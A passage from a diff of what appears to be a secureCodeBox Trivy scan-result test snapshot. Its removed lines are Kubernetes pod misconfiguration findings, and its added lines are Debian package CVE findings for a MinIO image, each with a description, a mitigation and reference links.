'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], "severity": "LOW", @@ -131070,115 +132369,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "http://www.securityfocus.com/bid/97067", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, ], "severity": "LOW", @@ -131186,154 +132427,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.securityfocus.com/bid/97067", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3134-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3161-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3366-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u11", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3412-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0033", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0033", - ], - }, - "category": "Misconfiguration", - "description": "Activate garbage collector on pod termination, as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", - "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0033", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + }, + { + "type": "URL", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0034", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0034", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0034", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], "severity": "LOW", @@ -131341,289 +132485,117 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0038", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0038", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, - "category": "Misconfiguration", - "description": "Enable kubelet server certificate rotation on controller-manager.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", - "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", + "category": "Vulnerability", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0038", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://support.apple.com/kb/HT211931", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.pcre.org/original/changelog.txt", }, ], "severity": "LOW", @@ -131631,173 +132603,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-controller-manager' of 